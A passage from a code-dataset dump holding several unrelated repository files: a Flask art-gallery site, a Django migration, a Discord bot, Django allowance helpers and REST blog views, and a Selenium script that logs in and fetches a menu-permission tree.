"pandas.to_datetime", "line_number": 250, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 301, "usage_type": "call"}]} +{"seq_id": "70871537794", "text": "import sqlite3\nfrom flask import Flask, render_template\nfrom flask import request\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef home():\n return render_template(\"home.html\")\n\n\n# this code shows all the movements\n@app.route(\"/movements\")\ndef movements():\n conn = sqlite3.connect(\"Art.db\")\n cur = conn.cursor()\n cur.execute(\"SELECT * FROM Movements\")\n results = cur.fetchall()\n return render_template(\"all_movements.html\", results=results)\n\n\n# this displays the all of artworks in a specific movement\n@app.route(\"/movement/\")\ndef movement(id):\n conn = sqlite3.connect(\"Art.db\")\n cur = conn.cursor()\n # sqlite can't handle really long integers so i added this\n # to prevent the website from breaking\n if id > 999:\n return render_template('404.html')\n # the id is specifying which movement\n cur.execute(\"SELECT name, description FROM Movements WHERE id=?\", (id,))\n mov = cur.fetchone()\n # if the mid doesn't exist return 404\n if not mov:\n return render_template('404.html')\n # the mid is the movement id\n cur.execute(\"SELECT aid, name, image FROM Work WHERE mid=?\", (id,))\n works = cur.fetchall()\n # if there were no works, works will be [] which isn't an error\n return render_template(\n \"movement.html\", name=mov[0], description=mov[1], results=works\n )\n\n\n# this code displays the artwork\n@app.route(\"/work/\")\ndef work(id):\n conn = sqlite3.connect(\"Art.db\")\n cur = conn.cursor()\n # sqlite can't handle really long integers so i added this\n # to prevent the website from breaking\n if id > 999:\n return render_template('404.html')\n # the aid is the artwork's id\n cur.execute(\"SELECT name, description,image FROM Work WHERE aid=?\", (id,))\n work = cur.fetchone()\n # if the aid doesn't exist return 404\n if not work:\n return render_template('404.html')\n return render_template(\n \"work.html\", name=work[0], description=work[1], item=work[2]\n )\n\n\n# this is the code for the artists\n@app.route(\"/artists\")\ndef artists():\n conn = sqlite3.connect(\"Art.db\")\n cur = conn.cursor()\n cur.execute(\"SELECT id, name, image FROM Artist\")\n results = cur.fetchall()\n return render_template(\"all_artists.html\", results=results)\n\n\n# this displays all of the artworks for a specific artist\n@app.route(\"/artist/\")\ndef artist(id):\n conn = sqlite3.connect(\"Art.db\")\n cur = conn.cursor()\n # sqlite can't handle really long integers so i added this\n # to prevent the website from breaking\n if id > 999:\n return render_template('404.html')\n # the id is specifying which artist\n cur.execute(\"SELECT name, description FROM Artist WHERE id=?\", (id,))\n artist = cur.fetchone()\n # if the aid doesn't exist return 404\n if not artist:\n return render_template('404.html')\n # sqlite can't handle really long integers so i added this\n # to prevent the website from breaking\n if id > 999:\n return render_template('404.html')\n # the rid is the artist id\n cur.execute(\"SELECT aid, name, image FROM Work WHERE rid=?\", (id,))\n works = cur.fetchall()\n # if there were no works for this artist works will be [] which isn't an\n # error\n return render_template(\n \"artist.html\", name=artist[0], description=artist[1], results=works\n )\n\n\n# this is the code for the search\n@app.route(\"/search\")\ndef search():\n query = request.args.get('query', type=str)\n\n if not query:\n 
return render_template(\"home.html\")\n\n conn = sqlite3.connect(\"Art.db\")\n cur = conn.cursor()\n\n # Use a parameterized query to avoid SQL injection\n cur.execute(\n \"SELECT aid, name FROM Work WHERE name LIKE ?\", ('%' + query + '%',)\n )\n wresults = cur.fetchall()\n\n cur.execute(\"SELECT aid, name FROM Work WHERE rid IN \\\n (SELECT id FROM Artist WHERE name LIKE ?)\",\n ('%' + query + '%',))\n aresults = cur.fetchall()\n results = wresults + aresults\n\n # there can be duplicates because a work can appear in wresults and\n # aresults, so i added this to remove them\n results = list(set(results))\n\n cur.close()\n conn.close()\n\n return render_template(\"search.html\", search_query=query, results=results)\n\n\n# this is the code for the 404 page, so the website doesn't break if anyone\n# types something weird in the url bar thing\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html')\n\n\nif __name__ == \"__main__\":\n # listen on all interfaces so I can connect from my phone to test the grid\n app.run(debug=True) # , host='0.0.0.0')\n", "repo_name": "RubyWilkins/ahproject", "sub_path": "routes.py", "file_name": "routes.py", "file_ext": "py", "file_size_in_byte": 4632, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 10, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 42, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 55, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 61, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 62, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 74, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 80, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 85, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 91, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 95, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 101, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 109, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 109, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 109, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 112, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 136, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 143, "usage_type": "call"}]} +{"seq_id": "29021015415", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass 
Migration(migrations.Migration):\n\n dependencies = [\n ('edx_proctoring', '0003_auto_20160101_0525'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='proctoredexamsoftwaresecurereview',\n name='attempt_code',\n field=models.CharField(unique=True, max_length=255, db_index=True),\n ),\n ]\n", "repo_name": "luckyjd/lms_edx", "sub_path": "edx-ficus.3-3/apps/edx/venvs/edxapp/lib/python2.7/site-packages/edx_proctoring/migrations/0004_auto_20160201_0523.py", "file_name": "0004_auto_20160201_0523.py", "file_ext": "py", "file_size_in_byte": 471, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 17, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "13537068888", "text": "from ast import alias\nfrom unicodedata import name\nimport random\nimport discord\nfrom discord.ext.commands import *\nfrom googleapiclient.discovery import build\nimport json\n\n\napi_key=\"API CUSTOM SEARCH from cloud google\"\n\nintents = discord.Intents.default()\nintents.members = True\nintents.guilds = True\n\nbot = Bot(command_prefix=\".\", intents=intents);\ntoken = \"\" #Token here\n\n@bot.event\nasync def on_ready():\n print(\"ready for using discord bot!\");\n \n\n@bot.command(aliases = ['hi','chào','chao','yo'])\nasync def hello(ctx):\n member = ctx.author\n await ctx.send(f\"{member.mention} do we even know each other?\");\n\n@bot.command(name = \"random\",aliases = ['rd'])\nasync def _random(ctx, min, max):\n member = ctx.author\n embed=discord.Embed(title=\"Tom the gambler\", description=\"The burden always rests on our shoulders\", color=0x5cb85c)\n embed.add_field(name=\"The fateful number:\", value=f\"```{random.randint(int(min),int(max))}```\", inline=True)\n embed.set_footer(text=f\"{member}\")\n await ctx.send(embed=embed)\n\n@bot.command(aliases = ['avt'])\nasync def avatar(ctx, member: discord.Member = None):\n member = ctx.author if not member else member\n embed=discord.Embed(title=f\"Avatar of {member.name}\", color=0x5cb85c)\n embed.set_image(url=member.avatar_url)\n embed.set_footer(text=ctx.message.created_at)\n await ctx.send(embed=embed)\n \n@bot.command(aliases = ['s'])\nasync def search(ctx, *,search):\n temp = search\n randomlist = random.randint(0, 9)\n resource = build(\"customsearch\", \"v1\", developerKey=api_key).cse()\n result = resource.list(\n q=f\"{search}\", cx=\"ID cse.google.com\", searchType=\"image\"\n ).execute()\n url = result[\"items\"][randomlist][\"link\"]\n embed = discord.Embed(title=f\"Image {temp}\")\n embed.set_image(url=url)\n await ctx.send(embed=embed)\nbot.run(token)\n\n", "repo_name": "chuongngxyen/Discord-Bot-TOMMY", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1858, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "discord.Intents.default", "line_number": 12, "usage_type": "call"}, {"api_name": "discord.Intents", "line_number": 12, "usage_type": "attribute"}, {"api_name": "discord.Embed", "line_number": 32, "usage_type": "call"}, 
{"api_name": "random.randint", "line_number": 33, "usage_type": "call"}, {"api_name": "discord.Member", "line_number": 38, "usage_type": "attribute"}, {"api_name": "discord.Embed", "line_number": 40, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 48, "usage_type": "call"}, {"api_name": "googleapiclient.discovery.build", "line_number": 49, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 54, "usage_type": "call"}]} +{"seq_id": "71271572036", "text": "\"\"\" childHelpers.py \"\"\"\nfrom datetime import date\nfrom .models import UpdateEvent, Child\nDAYS = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday',\n 'Sunday']\n\ndef calculate_coins(blocks_to_add, current_blocks, current_coins):\n \"\"\" Calculate how many coins to add \"\"\"\n total_blocks = blocks_to_add + current_blocks\n blocks_result = total_blocks % 5 # blocks value cannot exceed 4\n coins_result = total_blocks // 5 # 1 coin is awarded for every 5 blocks\n coins_result += current_coins\n return(blocks_result , coins_result) # return a tuple (blocks, coins)\n\ndef calculate_free_blocks(last_login_date, free_block_day):\n \"\"\" Count how many free blocks days have passed since last login \"\"\"\n\n last_login_weekday = last_login_date.weekday()\n today_weekday = date.today().weekday()\n num_days = (date.today() - last_login_date).days\n\n # Calculate days since most recent free block day\n days_since_free_block_day = ((today_weekday + 7) - free_block_day) % 7\n\n if num_days > days_since_free_block_day:\n blocks_to_add = 1 + (num_days - 1 - days_since_free_block_day) // 7\n else:\n blocks_to_add = 0\n\n print('Last login was {}, which was a {}.'\n .format(str(last_login_date),\n DAYS[last_login_weekday]))\n print('There were {} free block days since last login'.format(\n str(blocks_to_add)))\n\n return blocks_to_add\n\ndef calculate_allowance_to_add(last_login_date, weekly_allowance): \n \"\"\" Calculate daily allowance * number of days \"\"\"\n \n num_days = (date.today() - last_login_date).days\n daily_allowance = weekly_allowance / 7\n allowance_to_add = round(daily_allowance * num_days, 2)\n return allowance_to_add\n \ndef save_auto_dollars(child, old_dollars, dollars_to_add):\n \"\"\" Save new dollars and create UpdateEvent \"\"\"\n new_dollars = old_dollars + dollars_to_add\n reason = 'automatic allowance deposit'\n update_event = UpdateEvent(user=child.user, type=1,\n amount=dollars_to_add, reason=reason)\n child.dollars = new_dollars\n child.save()\n update_event.save()\n\ndef save_auto_blocks(child, old_blocks, new_blocks, blocks_to_add):\n \"\"\" Save new blocks and create UpdateEvent \"\"\"\n \n reason = 'automatic weekly block'\n update_event = UpdateEvent(user=child.user, type=0,\n amount=blocks_to_add, reason=reason)\n child.blocks = new_blocks\n child.save()\n update_event.save()\n \ndef save_auto_coins(child, old_coins, new_coins):\n \"\"\" Save new coins and create UpdateEvent \"\"\"\n \n reason = 'automatic blocks increment'\n update_event = UpdateEvent(user=child.user, type=5,\n amount=new_coins - old_coins, reason=reason)\n child.coins = new_coins\n child.save()\n update_event.save()", "repo_name": "danielsbonnin/b_and_d", "sub_path": "userPortal/childHelpers.py", "file_name": "childHelpers.py", "file_ext": "py", "file_size_in_byte": 2769, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datetime.date.today", "line_number": 19, "usage_type": "call"}, {"api_name": 
"datetime.date", "line_number": 19, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 20, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 20, "usage_type": "name"}, {"api_name": "datetime.date.today", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 41, "usage_type": "name"}, {"api_name": "models.UpdateEvent", "line_number": 50, "usage_type": "call"}, {"api_name": "models.UpdateEvent", "line_number": 60, "usage_type": "call"}, {"api_name": "models.UpdateEvent", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "23051324502", "text": "from rest_framework.views import APIView\nfrom rest_framework.generics import ListAPIView\nfrom rest_framework.response import Response\nfrom rest_framework.pagination import PageNumberPagination\nfrom rest_framework.filters import SearchFilter, OrderingFilter\nfrom rest_framework import status\nfrom rest_framework.permissions import IsAuthenticated, IsAuthenticatedOrReadOnly, AllowAny\nfrom rest_framework.decorators import api_view, permission_classes\nfrom django.utils.timezone import now\nfrom myblog.permissions import IsAuthorOrReadOnly, IsStaffOrIsSuperUser\nfrom django.http import Http404\n\nfrom .serializers import (\n PostCreateSerializer,\n PostUpdateSerializer,\n PostDetailSerializer,\n PostListSerializer\n)\nfrom comments.api.serializers import DetailCommentSerializer\nfrom comments.models import Comment\n\nfrom posts.models import Post\n\n\nclass CreatePost(APIView):\n permission_classes = [IsAuthenticated]\n\n def post(self, request):\n context ={}\n context['request'] = request\n\n serializer = PostCreateSerializer(data=request.data, context=context)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ListPost(ListAPIView):\n serializer_class = PostListSerializer\n permission_classes = [AllowAny,]\n pagination_class = PageNumberPagination\n filter_backends = (SearchFilter, OrderingFilter)\n search_fields = ('title', 'description', 'author__display_name')\n\n def get_queryset(self):\n return Post.objects.filter(is_draft=False, is_publish=True).order_by('-publish_at')\n\n\nclass ListPostNeedPublish(ListAPIView):\n serializer_class = PostListSerializer\n permission_classes = [IsAuthenticated, IsStaffOrIsSuperUser]\n pagination_class = PageNumberPagination\n filter_backends = (SearchFilter, OrderingFilter)\n search_fields = ('is_draft', 'title', 'description', 'author__display_name')\n\n def get_queryset(self):\n return Post.objects.filter(is_publish=False).order_by('update_at')\n\n\nclass DetailPost(APIView):\n permission_classes = [IsAuthenticatedOrReadOnly, IsAuthorOrReadOnly]\n \n def get_object(self, slug):\n try:\n return Post.objects.get(slug=slug)\n except Post.DoesNotExist:\n raise Http404\n\n def get(self, request, slug, format=None):\n try:\n user = request.user\n except:\n user = None\n context={'request': request}\n post = self.get_object(slug)\n if not post.is_publish:\n if user:\n if user.is_staff or user.is_superuser or post.author == user:\n serializer = PostDetailSerializer(post, context=context)\n return Response(serializer.data)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n post.views = post.views + 1\n post.save()\n serializer = PostDetailSerializer(post, context=context)\n return Response(serializer.data)\n\n def put(self, request, slug, format=None):\n try:\n post = 
Post.objects.get(slug=slug)\n except Post.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n context={'request': request}\n serializer = PostUpdateSerializer(post, data=request.data, context=context)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated ,IsStaffOrIsSuperUser])\ndef publish_post(request):\n messages = {}\n data = request.data\n try:\n user = request.user\n except:\n return Response(status=status.HTTP_404_NOT_FOUND)\n \n publish_all = data.get('publish_all', False)\n if publish_all:\n messages['publish_all'] = True\n print(\"right after entering the update\")\n try:\n Post.objects.filter(is_draft=False, is_publish=False).update(is_publish=True, publish_by=user, publish_at=now())\n except:\n messages['result_success_all'] = False\n return Response(data=messages, status=status.HTTP_400_BAD_REQUEST)\n messages['result_success_all'] = True\n print('right before return')\n return Response(data=messages, status=status.HTTP_200_OK)\n \n slugs = data.get('slugs',[])\n results = []\n result_success_all = True\n for slug in slugs:\n message = {}\n slug_dict = dict(slug)\n slug_str = slug.get(\"slug\", '')\n message['slug'] = slug_str\n try:\n post = Post.objects.get(slug=slug_str)\n except Post.DoesNotExist:\n result_success_all = False\n message['result'] = 'not_found'\n results.append(message)\n continue\n\n if post.is_draft:\n result_success_all = False\n message['result'] = 'post is draft'\n results.append(message)\n continue\n\n if post.is_publish:\n message['result'] = 'the post is already public'\n results.append(message)\n continue\n \n post.is_publish = True\n post.publish_by = user\n post.publish_at = now()\n post.save()\n\n message['result'] = 'published successfully'\n results.append(message)\n\n if result_success_all:\n messages['result_success_all'] = True\n else:\n messages['result_success_all'] = False\n messages['results'] = results\n \n return Response(data=messages, status=status.HTTP_200_OK)\n\n\nclass ListCommentsOfPost(ListAPIView):\n serializer_class = DetailCommentSerializer\n permission_classes = [AllowAny,]\n pagination_class = PageNumberPagination\n filter_backends = (SearchFilter, OrderingFilter)\n search_fields = ('body', 'author__display_name')\n\n def get_queryset(self):\n slug = self.kwargs['slug']\n try:\n post = Post.objects.get(slug=slug)\n except:\n return []\n return Comment.objects.filter(post=post, parent_comment=None).order_by('-created_at')\n\n\n\n", "repo_name": "PhamThoai/MyBLog", "sub_path": "backend/posts/api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6242, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rest_framework.views.APIView", "line_number": 25, "usage_type": "name"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 26, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 26, "usage_type": "name"}, {"api_name": "serializers.PostCreateSerializer", "line_number": 32, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 35, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 35, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 35, "usage_type": "name"}, 
{"api_name": "rest_framework.response.Response", "line_number": 36, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 36, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 36, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 39, "usage_type": "name"}, {"api_name": "serializers.PostListSerializer", "line_number": 40, "usage_type": "name"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 41, "usage_type": "name"}, {"api_name": "rest_framework.permissions.AllowAny", "line_number": 41, "usage_type": "name"}, {"api_name": "rest_framework.pagination.PageNumberPagination", "line_number": 42, "usage_type": "name"}, {"api_name": "rest_framework.filters.SearchFilter", "line_number": 43, "usage_type": "name"}, {"api_name": "rest_framework.filters.OrderingFilter", "line_number": 43, "usage_type": "name"}, {"api_name": "posts.models.Post.objects.filter", "line_number": 47, "usage_type": "call"}, {"api_name": "posts.models.Post.objects", "line_number": 47, "usage_type": "attribute"}, {"api_name": "posts.models.Post", "line_number": 47, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 50, "usage_type": "name"}, {"api_name": "serializers.PostListSerializer", "line_number": 51, "usage_type": "name"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 52, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 52, "usage_type": "name"}, {"api_name": "myblog.permissions.IsStaffOrIsSuperUser", "line_number": 52, "usage_type": "name"}, {"api_name": "rest_framework.pagination.PageNumberPagination", "line_number": 53, "usage_type": "name"}, {"api_name": "rest_framework.filters.SearchFilter", "line_number": 54, "usage_type": "name"}, {"api_name": "rest_framework.filters.OrderingFilter", "line_number": 54, "usage_type": "name"}, {"api_name": "posts.models.Post.objects.filter", "line_number": 58, "usage_type": "call"}, {"api_name": "posts.models.Post.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "posts.models.Post", "line_number": 58, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 61, "usage_type": "name"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 62, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAuthenticatedOrReadOnly", "line_number": 62, "usage_type": "name"}, {"api_name": "myblog.permissions.IsAuthorOrReadOnly", "line_number": 62, "usage_type": "name"}, {"api_name": "posts.models.Post.objects.get", "line_number": 66, "usage_type": "call"}, {"api_name": "posts.models.Post.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "posts.models.Post", "line_number": 66, "usage_type": "name"}, {"api_name": "posts.models.Post.DoesNotExist", "line_number": 67, "usage_type": "attribute"}, {"api_name": "posts.models.Post", "line_number": 67, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 68, "usage_type": "name"}, {"api_name": "serializers.PostDetailSerializer", "line_number": 80, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 81, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 82, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 82, "usage_type": "attribute"}, {"api_name": 
"rest_framework.status", "line_number": 82, "usage_type": "name"}, {"api_name": "serializers.PostDetailSerializer", "line_number": 86, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 87, "usage_type": "call"}, {"api_name": "posts.models.Post.objects.get", "line_number": 91, "usage_type": "call"}, {"api_name": "posts.models.Post.objects", "line_number": 91, "usage_type": "attribute"}, {"api_name": "posts.models.Post", "line_number": 91, "usage_type": "name"}, {"api_name": "posts.models.Post.DoesNotExist", "line_number": 92, "usage_type": "attribute"}, {"api_name": "posts.models.Post", "line_number": 92, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 93, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_404_NOT_FOUND", "line_number": 93, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 93, "usage_type": "name"}, {"api_name": "serializers.PostUpdateSerializer", "line_number": 96, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 99, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 99, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 99, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 100, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 100, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 100, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 111, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_404_NOT_FOUND", "line_number": 111, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 111, "usage_type": "name"}, {"api_name": "posts.models.Post.objects.filter", "line_number": 118, "usage_type": "call"}, {"api_name": "posts.models.Post.objects", "line_number": 118, "usage_type": "attribute"}, {"api_name": "posts.models.Post", "line_number": 118, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 118, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 121, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 121, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 121, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 124, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 124, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 124, "usage_type": "name"}, {"api_name": "posts.models.Post.objects.get", "line_number": 135, "usage_type": "call"}, {"api_name": "posts.models.Post.objects", "line_number": 135, "usage_type": "attribute"}, {"api_name": "posts.models.Post", "line_number": 135, "usage_type": "name"}, {"api_name": "posts.models.Post.DoesNotExist", "line_number": 136, "usage_type": "attribute"}, {"api_name": "posts.models.Post", "line_number": 136, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 155, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 167, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 167, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 167, "usage_type": "name"}, 
{"api_name": "rest_framework.decorators.api_view", "line_number": 103, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 104, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 104, "usage_type": "name"}, {"api_name": "myblog.permissions.IsStaffOrIsSuperUser", "line_number": 104, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 170, "usage_type": "name"}, {"api_name": "comments.api.serializers.DetailCommentSerializer", "line_number": 171, "usage_type": "name"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 172, "usage_type": "name"}, {"api_name": "rest_framework.permissions.AllowAny", "line_number": 172, "usage_type": "name"}, {"api_name": "rest_framework.pagination.PageNumberPagination", "line_number": 173, "usage_type": "name"}, {"api_name": "rest_framework.filters.SearchFilter", "line_number": 174, "usage_type": "name"}, {"api_name": "rest_framework.filters.OrderingFilter", "line_number": 174, "usage_type": "name"}, {"api_name": "posts.models.Post.objects.get", "line_number": 180, "usage_type": "call"}, {"api_name": "posts.models.Post.objects", "line_number": 180, "usage_type": "attribute"}, {"api_name": "posts.models.Post", "line_number": 180, "usage_type": "name"}, {"api_name": "comments.models.Comment.objects.filter", "line_number": 183, "usage_type": "call"}, {"api_name": "comments.models.Comment.objects", "line_number": 183, "usage_type": "attribute"}, {"api_name": "comments.models.Comment", "line_number": 183, "usage_type": "name"}]} +{"seq_id": "27715604146", "text": "# 一键生成菜单功能按钮\nimport datetime,json,re,time,requests,os\nfrom json import JSONDecodeError\nfrom selenium import webdriver\nfrom urllib.parse import urlencode\nfrom config import hayden_conf\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.wait import WebDriverWait\n\ndef get_html_source(url,session):\n if isinstance(session,requests.sessions.Session):\n req=session.get(url)\n if req.status_code==200:\n return req.text\n else:\n raise Exception(\"请求失败{}\".format(req.status_code))\ndef parse_html(data):\n data_change=None\n try:\n data_change=json.loads(data)\n except JSONDecodeError:\n print(\"数据不是json\",data)\n if data_change and \"data\" in data_change.keys():\n items=data_change.get(\"data\")\n merge={}\n for item in items:\n merge[item[\"codepath\"]] = [item[\"name\"]]\n else:\n raise Exception(\"解析data数据失败\")\n order_dic = sorted(merge.items(), key=lambda x: x[0])\n return order_dic\ndef generate_session(url,name,password,module=\"sy\"):\n option=Options()\n option.add_argument(\"--headless\")\n option.add_argument(\"--disable-gpu\")\n driver=webdriver.Chrome(chrome_options=option)\n driver.get(url)\n if int(hayden_conf.LOGIN_TYPE)==1:\n driver.find_element_by_id(\"name\").send_keys(name)\n driver.find_element_by_id(\"pwd1\").send_keys(password)\n driver.find_element_by_xpath(r'//a[@onclick=\"login()\"]').click()\n elif int(hayden_conf.LOGIN_TYPE)==2:\n driver.find_element_by_id(\"username\").send_keys(name)\n driver.find_element_by_id(\"pwd1\").send_keys(password)\n driver.find_element_by_css_selector(r'input[value=\"立即登录\"]').click()\n time.sleep(1)\n wait=WebDriverWait(driver,10)\n wait.until(EC.presence_of_element_located((By.XPATH,\"/html/body/script\")))\n\n if module==\"sy\":\n 
driver.get(url+\"#eyJtYyI6InN5IiwiZmMiOiJTWV9QRVJNSVNTT05fUEMiLCJ1YyI6IjAxNzAwMDQ1MDAxMCJ9\")\n time.sleep(1)\n html_source=driver.page_source\n csrf=re.search(\"window.csrf = '(.*?)'\",html_source).group(1)\n cookies=driver.get_cookies()\n driver.close()\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Connection': 'keep-alive',\n 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3'\n }\n sess=requests.session()\n sess.headers.update(headers)\n for cookie in cookies:\n sess.cookies.set(cookie[\"name\"],cookie[\"value\"])\n sess.headers.update({\"csrf\":csrf})\n return sess\ndef save_to_file(parse_data_dic,menu=\"pc\"):\n if not os.path.exists(\"./file\"):\n os.mkdir(\"./file\")\n with open(\"file/{0}_{1}_{2}_{3}.txt\".format(menu,hayden_conf.DOMAIN[7:].split(\"/\")[0].split(\":\")[0],hayden_conf.USERNAME,datetime.date.today()),\"w\",encoding=\"utf-8\") as f:\n for d in parse_data_dic:\n k,v=d\n k1=str(k).split(\"#\",1)[-1]\n if len(str(k).split(\"#\",1))==1:\n f.write(\"\\n\")\n f.write(k1 + \":\" + str(v) + \"\\n\")\ndef main():\n params={\n \"clientType\": 0,\n \"contentType\": \"json\",\n \"ajax\": \"true\",\n }\n url=hayden_conf.DOMAIN+\"/sy/SY_PERMISSON_PC/getPermissionTree?\"+urlencode(params)\n user=hayden_conf.USERNAME\n pwd=hayden_conf.PASSWORD\n req_session=generate_session(hayden_conf.DOMAIN,user,pwd)\n # PC端\n source=get_html_source(url,req_session)\n 